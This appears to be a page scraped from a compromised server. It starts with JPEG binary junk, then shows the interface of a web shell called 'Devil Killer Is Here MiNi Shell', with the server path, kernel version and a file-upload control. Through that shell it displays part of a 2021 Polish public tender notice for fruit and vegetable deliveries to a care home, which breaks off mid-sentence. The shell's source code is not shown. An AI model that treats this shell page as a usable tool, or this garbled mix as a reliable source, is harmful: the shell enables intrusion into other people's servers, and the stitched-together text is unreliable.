JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211123/0028035701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sprzedaż wraz z sukcesywną dostawą warzyw i owoców </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej Dom Kombatanta im. św. Rafała Kalinowskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001270196</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">dr Emila Cyrana 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubliniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34/ 356-40-04</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">34/ 356-41-92</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">administracja@dpskombatant.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dpskombatant.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Opieka społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprzedaż wraz z sukcesywną dostawą warzyw i owoców </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d5093f17-4c45-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00280357</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005110/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.12 Sprzedaż wraz z sukcesywną dostawą warzyw i owoców</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/dpskombatant <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/dpskombatant</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcą, w tym wszelkie oświadczenia, <br/> wnioski zawiadomienia oraz informacje, przekazywane są w formie elektronicznej <br/> za pośrednictwem Platformy i formularza „Wyślij wiadomość”: <br/> https://platformazakupowa.pl/pn/dpskombatant na stronie danego postępowania. <br/> Za datę przekazania (wpływu) oświadczeń wniosków, zawiadomień oraz informacji <br/> przyjmuję się datę ich przesłania za pośrednictwem Platformy <br/> poprzez kliknięcie przycisku „wyślij” wiadomości”, po którym pojawi się komunikat, <br/> że wiadomość została wysłana do Zamawiającego. <br/>Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji <br/> za pośrednictwem udostępnionego kanału. Wyjaśnienia treści specyfikacji oraz jej <br/> ewentualne zmiany będą dokonywane zgodnie z art. 284 ustawy p.z.p. Treść <br/> pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami, bądź informacje o <br/> dokonaniu zmiany specyfikacji, Zamawiający będzie zamieszczał na Platformie w <br/> sekcji „Komunikaty”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/> z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich <br/> danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie <br/> danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) <br/> informujemy, że: <br/>1)	administratorem Pani/Pana danych osobowych w w/w postępowaniu jest: Dom Pomocy Społecznej „Dom Kombatanta” w Lublińcu przy ul. Cyrana 10, <br/>2)	inspektorem ochrony danych osobowych w Domu Pomocy Społecznej „Dom Kombatanta” w Lublińcu jest – Pani Agnieszka Klimas – Powiatowe Centrum Usług Społecznych 42-700 Lubliniec ul. Sobieskiego 9 w Lublińcu, tel. 530-035-528 oraz e-mail – iod2@lubliniec.starostwo.gov.pl,<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na sprzedaż wraz z sukcesywną dostawą warzyw i owoców na rzecz Domu Pomocy Społecznej „Dom Kombatanta w Lublińcu przy ul. dr E. Cyrana 10, prowadzonym w trybie podstawowym,<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843 z późn. zm.), dalej „ustawa Pzp”,<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych**;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAG.26.7.22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 64398,26 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1	Arbuz	kg	90<br/>2	Banan gat. I długość 15-18 cm	kg	340<br/>3	Botwinka	kg	100<br/>4	Brokuły średnica minimum 15 cm	szt	420<br/>5	Brukselka	kg	50<br/>6	Brzoskwinia jedna sztuka winna mieć od 120g do 150g	kg	90<br/>7	Burak czerwony średnica buraka nie mniejsza niż 7 cm	kg	850<br/>8	Cebula	kg	550<br/>9	Cukinia	kg	260<br/>10	Cytryna	kg	35<br/>11	Czereśnie	kg	60<br/>12	Czosnek	szt	30<br/>13	Dynia Hokkaido	kg	90<br/>14	Fasola szparagowa bezwłóknista	kg	130<br/>15	Grapefruit	kg	60<br/>16	Gruszki 1 szt winna mieć od 170g do 220g	kg	80<br/>17	Jabłka sortowane średnica od 7 do 8 cm	kg	900<br/>18	Jabłka kompotowe	kg	1700<br/>19	Kalafior średnica minimum 20 cm	szt	500<br/>20	Kalarepa bulwa z zielonymi liśćmi	kg	350<br/>21	Kapusta biała	kg	1000<br/>22	Kapusta biała młoda	kg	200<br/>23	Kapusta czerwona	kg	340<br/>24	Kapusta kiszona nie kwaszona z marchewką	kg	1000<br/>25	Kapusta pekińska	kg	520<br/>26	Kapusta włoska	kg	100<br/>27	Kiwi 1 szt winna mieć od 100g do 200g	kg	70<br/>28	Koperek zielony 1p - min. 40g	p	1800<br/>29	Mandarynka	kg	80<br/>30	Marchew konsumpcyjna gat. I cała zdrowa, średnica korzeni marchwi powinna być nie mniejsza niż 20 mm kg	2400<br/>31	Mieszanka owoców suszonych	kg	5<br/>32	Nektaryna 1 szt winna mieć od 120g do 150g	kg	80<br/>33	Ogórek gruntowy długość do 8 cm	kg	80<br/>34	Ogórek kiszony	kg	530<br/>35	Ogórek małosolny	kg	70<br/>36	Ogórki zielone średnica ogórka nie mniejsza niż 4 cm	kg	220<br/>37	Papryka czerwona	kg	140<br/>38	Pieczarki białe, średnica do 5 cm, zamknięte jasne blszki	kg	340<br/>39	Pietruszka cała zdrowa, średnica korzeni pietruszki powinna być nie mniejsza niż 20 mm	kg	260<br/>40	Pietruszka zielona 1p - min 40g	p	1700<br/>41	Pomarańcza 1 szt winna mieć od 150g do 200g	kg	250<br/>42	Pomidory 1 szt winna mieć od 100g do 120g	kg	900<br/>43	Pomidory malinowe	kg	280<br/>44	Pomidory rzymskie, śliwkowe	kg	220<br/>45	Por	kg	35<br/>46	Porzeczka	kg	30<br/>47	Rabarbar	kg	120<br/>48	Rzodkiewka	p	700<br/>49	Rzodkiew biała	kg	170<br/>50	Sałata lodowa 1 szt - 500g	szt	600<br/>51	Sałata zielona cała, bez wyciętych środków główek, min 300g	szt	200<br/>52	Seler	kg	550<br/>53	Szpinak	kg	120<br/>54	Szczypiorek 1p - min 40g	p	1300<br/>55	Śliwki typu węgierka	kg	350<br/>56	Truskawki	kg	150<br/>57	Winogrona	kg	100<br/>58	Wiśnie	kg	120 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 37700,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03200000-3 - Zboża, ziemniaki, warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03221110-0 - Warzywa korzeniowe</p> <p class="mb-0">03221111-7 - Burak ćwikłowy</p> <p class="mb-0">03221112-4 - Marchew</p> <p class="mb-0">03221113-1 - Cebula</p> <p class="mb-0">03221120-3 - Warzywa bulwiaste</p> <p class="mb-0">03221212-5 - Fasola szparagowa</p> <p class="mb-0">03221230-7 - Papryka</p> <p class="mb-0">03221240-0 - Pomidory</p> <p class="mb-0">03221250-3 - Cukinia</p> <p class="mb-0">03221260-6 - Grzyby</p> <p class="mb-0">03221270-9 - Ogórki</p> <p class="mb-0">03221300-9 - Warzywa liściaste</p> <p class="mb-0">03221410-3 - Kapusta</p> <p class="mb-0">03221420-6 - Kalafior</p> <p class="mb-0">03221430-9 - Brokuły</p> <p class="mb-0">03222111-4 - Banany</p> <p class="mb-0">03222118-3 - Owoce kiwi</p> <p class="mb-0">03222210-8 - Cytryny</p> <p class="mb-0">03222220-1 - Pomarańcze</p> <p class="mb-0">03222230-4 - Grejpfruty</p> <p class="mb-0">03222240-7 - Mandarynki</p> <p class="mb-0">03222311-6 - Porzeczki</p> <p class="mb-0">03222321-9 - Jabłka</p> <p class="mb-0">03222322-6 - Gruszki</p> <p class="mb-0">03222332-9 - Brzoskwinie</p> <p class="mb-0">03222333-6 - Wiśnie</p> <p class="mb-0">15331461-6 - Kapusta kiszona puszkowana</p> <p class="mb-0">15332180-9 - Melony</p> <p class="mb-0">15332410-1 - Owoce suszone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Jako najkorzystniejszą Zamawiający wybierze ofertę, która uzyska najwyższą <br/> iIość punktów (Lp) wg poniższego wzoru:<br/><br/>Lp = C + TP<br/>1) Cena brutto oferty (C) – znaczenie 60%<br/>2) Termin płatności (TP) znaczenie 40%<br/><br/>2.	Punktacja za kryterium cena brutto oferty (C): oferta z najniższą ceną brutto za <br/> pełny zakres zamówienia otrzyma maksymalną ilość punktów C = 60, pozostałe <br/> oferty zostaną przeliczone proporcjonalnie do najtańszej wg poniższego wzoru:<br/> <br/><br/>Cena oferty najkorzystniejszej<br/>C = ----------------------------------------------- x 60<br/> Cena oferty badanej<br/><br/> 3. Punktacja za kryterium Termin płatności (TP): oferta z najdłuższym terminem <br/> płatności otrzyma maksymalną ilość punktów TP = 40<br/><br/>Wykonawca może zaoferować termin płatności:<br/>a/ Termin płatności 21 dni - 30 pkt<br/>b/ Termin płatności 30 dni - 40 pkt<br/><br/>Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba punktów. <br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień <br/> dotyczących treści złożonej oferty, w tym zaoferowanej ceny. <br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za <br/> najkorzystniejszą. Jako najkorzystniejsza zostanie wybrana oferta, która uzyska <br/> najwyższą liczbę punktów wynikającą z sumy punktów przyznanych za kryteria <br/> wyboru oferty. Punkty zostaną zaokrąglone do jednego miejsca po przecinku. <br/> Jeżeli dwie lub więcej ofert uzyska taką samą liczbę punktów Zamawiający <br/> wybierze ofertę z niższą ceną, jeżeli również ceny będą identyczne, Zamawiający <br/> wybierze ofertę posiadającą najdłuższy termin płatności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1	Ziemniaki konsumpcyjne worek max 15 kg, średnica minimum 8 cm	kg	26000 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 26698,26 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03200000-3 - Zboża, ziemniaki, warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03212100-1 - Ziemniaki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Jako najkorzystniejszą Zamawiający wybierze ofertę, która uzyska najwyższą <br/> iIość punktów (Lp) wg poniższego wzoru:<br/><br/>Lp = C + TP<br/>1) Cena brutto oferty (C) – znaczenie 60%<br/>2) Termin płatności (TP) znaczenie 40%<br/><br/>2.	Punktacja za kryterium cena brutto oferty (C): oferta z najniższą ceną brutto za <br/> pełny zakres zamówienia otrzyma maksymalną ilość punktów C = 60, pozostałe <br/> oferty zostaną przeliczone proporcjonalnie do najtańszej wg poniższego wzoru:<br/> <br/><br/>Cena oferty najkorzystniejszej<br/>C = ----------------------------------------------- x 60<br/> Cena oferty badanej<br/><br/> 3. Punktacja za kryterium Termin płatności (TP): oferta z najdłuższym terminem <br/> płatności otrzyma maksymalną ilość punktów TP = 40<br/><br/>Wykonawca może zaoferować termin płatności:<br/>a/ Termin płatności 21 dni - 30 pkt<br/>b/ Termin płatności 30 dni - 40 pkt<br/><br/>Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba punktów. <br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień <br/> dotyczących treści złożonej oferty, w tym zaoferowanej ceny. <br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za <br/> najkorzystniejszą. Jako najkorzystniejsza zostanie wybrana oferta, która uzyska <br/> najwyższą liczbę punktów wynikającą z sumy punktów przyznanych za kryteria <br/> wyboru oferty. Punkty zostaną zaokrąglone do jednego miejsca po przecinku. <br/> Jeżeli dwie lub więcej ofert uzyska taką samą liczbę punktów Zamawiający <br/> wybierze ofertę z niższą ceną, jeżeli również ceny będą identyczne, Zamawiający <br/> wybierze ofertę posiadającą najdłuższy termin płatności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie 